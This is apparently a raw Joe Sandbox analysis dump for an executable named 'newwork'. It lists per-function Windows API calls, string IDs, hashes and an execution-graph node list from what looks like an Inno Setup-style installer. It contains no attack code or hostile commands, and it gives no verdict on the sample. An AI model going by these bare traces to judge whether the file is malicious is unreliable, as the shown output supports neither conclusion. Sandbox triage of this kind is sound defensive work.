                                                                                • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                • API String ID: 4190037839-2401316094
                                                                                • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                  • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                • LocalFree.KERNEL32(0050A320,00000000,00401AB4), ref: 00401A1B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0050A320,00000000,00401AB4), ref: 00401A3A
                                                                                • LocalFree.KERNEL32(0050B320,?,00000000,00008000,0050A320,00000000,00401AB4), ref: 00401A79
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID:
                                                                                • API String ID: 3782394904-0
                                                                                • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000$9@
                                                                                • API String ID: 1220098344-1503883590
                                                                                • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CommandHandleLineModule
                                                                                • String ID: U1hd.@$X%O
                                                                                • API String ID: 2123368496-3163241700
                                                                                • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: )q@
                                                                                • API String ID: 3660427363-2284170586
                                                                                • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                Strings
                                                                                • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                • Setup, xrefs: 00409CAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                • API String ID: 2030045667-3271211647
                                                                                • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                APIs
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                Execution Graph

                                                                                Execution Coverage:16.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:4.6%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:62
                                                                                execution_graph 49369 40cd00 49370 40cd12 49369->49370 49371 40cd0d 49369->49371 49373 406f48 CloseHandle 49371->49373 49373->49370 49374 498ba8 49432 403344 49374->49432 49376 498bb6 49435 4056a0 49376->49435 49378 498bbb 49438 40631c GetModuleHandleA GetProcAddress 49378->49438 49382 498bc5 49446 40994c 49382->49446 49713 4032fc 49432->49713 49434 403349 GetModuleHandleA GetCommandLineA 49434->49376 49437 4056db 49435->49437 49714 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49435->49714 49437->49378 49439 406338 49438->49439 49440 40633f GetProcAddress 49438->49440 49439->49440 49441 406355 GetProcAddress 49440->49441 49442 40634e 49440->49442 49443 406364 SetProcessDEPPolicy 49441->49443 49444 406368 49441->49444 49442->49441 49443->49444 49445 4063c4 6FCB1CD0 49444->49445 49445->49382 49715 409024 49446->49715 49713->49434 49714->49437 49787 408cbc 49715->49787 49718 4085dc GetSystemDefaultLCID 49722 408612 49718->49722 49719 406dec 19 API calls 49719->49722 49720 408568 19 API calls 49720->49722 49721 403450 18 API calls 49721->49722 49722->49719 49722->49720 49722->49721 49726 408674 49722->49726 49723 406dec 19 API calls 49723->49726 49724 408568 19 API calls 49724->49726 49725 403450 18 API calls 49725->49726 49726->49723 49726->49724 49726->49725 49727 4086f7 49726->49727 49863 403420 49727->49863 49730 408720 GetSystemDefaultLCID 49867 408568 GetLocaleInfoA 49730->49867 49733 403450 18 API calls 49734 408760 49733->49734 49735 408568 19 API calls 49734->49735 49736 408775 49735->49736 49737 408568 19 API calls 49736->49737 49738 408799 49737->49738 49873 4085b4 GetLocaleInfoA 49738->49873 49741 4085b4 GetLocaleInfoA 49742 4087c9 49741->49742 49743 408568 19 API calls 49742->49743 49744 4087e3 49743->49744 49745 4085b4 GetLocaleInfoA 49744->49745 49746 408800 49745->49746 49747 408568 19 API calls 49746->49747 49748 40881a 49747->49748 49749 403450 18 API calls 49748->49749 49750 408827 49749->49750 49751 408568 19 API calls 49750->49751 49752 40883c 49751->49752 49753 403450 18 API calls 49752->49753 49754 408849 49753->49754 49755 4085b4 GetLocaleInfoA 49754->49755 49756 408857 49755->49756 49757 408568 19 API calls 49756->49757 49758 408871 49757->49758 49759 403450 18 API calls 49758->49759 49760 40887e 49759->49760 49761 408568 19 API calls 49760->49761 49762 408893 49761->49762 49763 403450 18 API calls 49762->49763 49764 4088a0 49763->49764 49765 408568 19 API calls 49764->49765 49766 4088b5 49765->49766 49767 4088d2 49766->49767 49768 4088c3 49766->49768 49770 403494 4 API calls 49767->49770 49881 403494 49768->49881 49771 4088d0 49770->49771 49772 408568 19 API calls 49771->49772 49773 4088f4 49772->49773 49774 408911 49773->49774 49775 408902 49773->49775 49777 403400 4 API calls 49774->49777 49776 403494 4 API calls 49775->49776 49778 40890f 49776->49778 49777->49778 49875 403634 49778->49875 49788 408cc8 49787->49788 49795 406dec LoadStringA 49788->49795 49808 4034e0 49795->49808 49798 403450 49799 403454 49798->49799 49802 403464 49798->49802 49801 4034bc 18 API calls 49799->49801 49799->49802 49800 403490 49804 403400 49800->49804 49801->49802 49802->49800 49858 402660 49802->49858 49805 40341f 49804->49805 49806 403406 49804->49806 49805->49718 49806->49805 49807 402660 4 API calls 49806->49807 49807->49805 49813 4034bc 49808->49813 49810 4034f0 49811 403400 4 API calls 49810->49811 49812 403508 49811->49812 49812->49798 49814 4034c0 49813->49814 49815 4034dc 49813->49815 49818 402648 49814->49818 49815->49810 49817 4034c9 49817->49810 49819 40264c 49818->49819 49821 402656 49818->49821 49824 402088 49819->49824 49820 402652 49820->49821 49835 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49820->49835 49821->49817 49821->49821 49825 40209c 49824->49825 49826 4020a1 49824->49826 49836 4019cc RtlInitializeCriticalSection 49825->49836 49828 4020c6 RtlEnterCriticalSection 49826->49828 49829 4020d0 49826->49829 49834 4020a5 49826->49834 49828->49829 49829->49834 49843 401f94 49829->49843 49832 4021f1 RtlLeaveCriticalSection 49833 4021fb 49832->49833 49833->49820 49834->49820 49835->49821 49837 4019f0 RtlEnterCriticalSection 49836->49837 49838 4019fa 49836->49838 49837->49838 49839 401a18 LocalAlloc 49838->49839 49840 401a32 49839->49840 49841 401a81 49840->49841 49842 401a77 RtlLeaveCriticalSection 49840->49842 49841->49826 49842->49841 49844 401fa4 49843->49844 49845 401fd0 49844->49845 49848 401ff4 49844->49848 49849 401f0c 49844->49849 49845->49848 49854 401db4 49845->49854 49848->49832 49848->49833 49850 40178c LocalAlloc VirtualAlloc VirtualFree VirtualFree VirtualAlloc 49849->49850 49851 401f1c 49850->49851 49852 401f29 49851->49852 49853 401e80 9 API calls 49851->49853 49852->49844 49853->49852 49855 401dd2 49854->49855 49856 401e02 49854->49856 49855->49848 49856->49855 49857 401d1c 9 API calls 49856->49857 49857->49855 49859 402664 49858->49859 49861 40266e 49858->49861 49859->49861 49862 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49859->49862 49861->49800 49862->49861 49864 403426 49863->49864 49865 40344b 49864->49865 49866 402660 4 API calls 49864->49866 49865->49730 49866->49864 49868 4085a1 49867->49868 49869 40858f 49867->49869 49871 403494 4 API calls 49868->49871 49870 4034e0 18 API calls 49869->49870 49872 40859f 49870->49872 49871->49872 49872->49733 49874 4085d0 49873->49874 49874->49741 49876 40363c 49875->49876 49877 4034bc 18 API calls 49876->49877 49878 40364f 49877->49878 49879 403450 18 API calls 49878->49879 49880 403677 49879->49880 49883 403498 49881->49883 49882 4034ba 49882->49771 49883->49882 49884 402660 4 API calls 49883->49884 49884->49882 52174 42f520 52175 42f52b 52174->52175 52176 42f52f NtdllDefWindowProc_A 52174->52176 52176->52175 52177 4358e0 52178 4358f5 52177->52178 52182 43590f 52178->52182 52183 4352c8 52178->52183 52193 435312 52183->52193 52194 4352f8 52183->52194 52184 403400 4 API calls 52185 435717 52184->52185 52185->52182 52196 435728 18 API calls 52185->52196 52186 446da4 18 API calls 52186->52194 52187 403744 18 API calls 52187->52194 52188 403450 18 API calls 52188->52194 52189 402648 18 API calls 52189->52194 52192 4038a4 18 API calls 52192->52194 52193->52184 52194->52186 52194->52187 52194->52188 52194->52189 52194->52192 52194->52193 52197 4343b0 52194->52197 52209 434b74 18 API calls 52194->52209 52210 431ca0 52194->52210 52196->52182 52198 43446d 52197->52198 52199 4343dd 52197->52199 52234 434310 18 API calls 52198->52234 52201 403494 4 API calls 52199->52201 52203 4343eb 52201->52203 52202 43445f 52204 403400 4 API calls 52202->52204 52205 403778 18 API calls 52203->52205 52206 4344bd 52204->52206 52207 43440c 52205->52207 52206->52194 52207->52202 52216 494944 52207->52216 52209->52194 52211 431cae 52210->52211 52214 431cc0 52210->52214 52275 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52211->52275 52213 431ce2 52213->52194 52214->52213 52276 431c40 18 API calls 52214->52276 52217 49497c 52216->52217 52218 494a14 52216->52218 52219 403494 4 API calls 52217->52219 52235 448930 52218->52235 52223 494987 52219->52223 52221 403400 4 API calls 52222 494a38 52221->52222 52224 403400 4 API calls 52222->52224 52225 4037b8 18 API calls 52223->52225 52227 494997 52223->52227 52226 494a40 52224->52226 52228 4949b0 52225->52228 52226->52207 52227->52221 52228->52227 52229 4037b8 18 API calls 52228->52229 52230 4949d3 52229->52230 52231 403778 18 API calls 52230->52231 52232 494a04 52231->52232 52233 403634 18 API calls 52232->52233 52233->52218 52234->52202 52236 448955 52235->52236 52246 448998 52235->52246 52237 403494 4 API calls 52236->52237 52241 448960 52237->52241 52238 4489ac 52240 403400 4 API calls 52238->52240 52243 4489df 52240->52243 52242 4037b8 18 API calls 52241->52242 52244 44897c 52242->52244 52243->52227 52245 4037b8 18 API calls 52244->52245 52245->52246 52246->52238 52247 44852c 52246->52247 52248 403494 4 API calls 52247->52248 52249 448562 52248->52249 52250 4037b8 18 API calls 52249->52250 52251 448574 52250->52251 52252 403778 18 API calls 52251->52252 52253 448595 52252->52253 52254 4037b8 18 API calls 52253->52254 52255 4485ad 52254->52255 52256 403778 18 API calls 52255->52256 52257 4485d8 52256->52257 52258 4037b8 18 API calls 52257->52258 52269 4485f0 52258->52269 52259 448628 52261 403420 4 API calls 52259->52261 52260 4486c3 52265 4486cb GetProcAddress 52260->52265 52262 448708 52261->52262 52262->52238 52263 44864b LoadLibraryExA 52263->52269 52264 44865d LoadLibraryA 52264->52269 52266 4486de 52265->52266 52266->52259 52268 403450 18 API calls 52268->52269 52269->52259 52269->52260 52269->52263 52269->52264 52269->52268 52271 403b80 52269->52271 52274 43da88 18 API calls 52269->52274 52272 402648 18 API calls 52271->52272 52273 403b86 52272->52273 52273->52269 52274->52269 52275->52214 52276->52213 52277 416b42 52278 416bea 52277->52278 52279 416b5a 52277->52279 52296 41531c 18 API calls 52278->52296 52281 416b74 SendMessageA 52279->52281 52282 416b68 52279->52282 52292 416bc8 52281->52292 52283 416b72 CallWindowProcA 52282->52283 52284 416b8e 52282->52284 52283->52292 52293 41a058 GetSysColor 52284->52293 52287 416b99 SetTextColor 52288 416bae 52287->52288 52294 41a058 GetSysColor 52288->52294 52290 416bb3 SetBkColor 52295 41a6e0 GetSysColor CreateBrushIndirect 52290->52295 52293->52287 52294->52290 52295->52292 52296->52292 52297 416644 52298 416651 52297->52298 52299 4166ab 52297->52299 52304 416550 CreateWindowExA 52298->52304 52300 416658 SetPropA SetPropA 52300->52299 52301 41668b 52300->52301 52302 41669e SetWindowPos 52301->52302 52302->52299 52304->52300 52305 4222e4 52306 4222f3 52305->52306 52311 421274 52306->52311 52308 422313 52312 4212e3 52311->52312 52316 421283 52311->52316 52315 4212f4 52312->52315 52336 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 52312->52336 52314 421322 52318 421395 52314->52318 52326 42133d 52314->52326 52315->52314 52317 4213ba 52315->52317 52316->52312 52335 408d2c 33 API calls 52316->52335 52320 4213ce SetMenu 52317->52320 52333 421393 52317->52333 52324 4213a9 52318->52324 52318->52333 52319 4213e6 52339 4211bc 24 API calls 52319->52339 52320->52333 52323 4213ed 52323->52308 52334 4221e8 10 API calls 52323->52334 52327 4213b2 SetMenu 52324->52327 52328 421360 GetMenu 52326->52328 52326->52333 52327->52333 52329 421383 52328->52329 52330 42136a 52328->52330 52337 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 52329->52337 52332 42137d SetMenu 52330->52332 52332->52329 52333->52319 52338 421e2c 25 API calls 52333->52338 52334->52308 52335->52316 52336->52315 52337->52333 52338->52319 52339->52323 52340 44b4a8 52341 44b4b6 52340->52341 52343 44b4d5 52340->52343 52342 44b38c 25 API calls 52341->52342 52341->52343 52342->52343 52344 448728 52345 448756 52344->52345 52346 44875d 52344->52346 52348 403400 4 API calls 52345->52348 52347 448771 52346->52347 52349 44852c 21 API calls 52346->52349 52347->52345 52350 403494 4 API calls 52347->52350 52351 448907 52348->52351 52349->52347 52352 44878a 52350->52352 52353 4037b8 18 API calls 52352->52353 52354 4487a6 52353->52354 52355 4037b8 18 API calls 52354->52355 52356 4487c2 52355->52356 52356->52345 52357 4487d6 52356->52357 52358 4037b8 18 API calls 52357->52358 52359 4487f0 52358->52359 52376 431bd0 52359->52376 52361 448812 52362 431ca0 18 API calls 52361->52362 52367 448832 52361->52367 52362->52361 52363 448888 52380 442334 52363->52380 52365 448870 52365->52363 52392 4435d0 18 API calls 52365->52392 52367->52365 52391 4435d0 18 API calls 52367->52391 52369 4488bc GetLastError 52393 4484c0 18 API calls 52369->52393 52371 4488cb 52394 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52371->52394 52373 4488e0 52395 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52373->52395 52375 4488e8 52377 431bd6 52376->52377 52378 402648 18 API calls 52377->52378 52379 431c06 52378->52379 52379->52361 52381 443312 52380->52381 52382 44236d 52380->52382 52384 403400 4 API calls 52381->52384 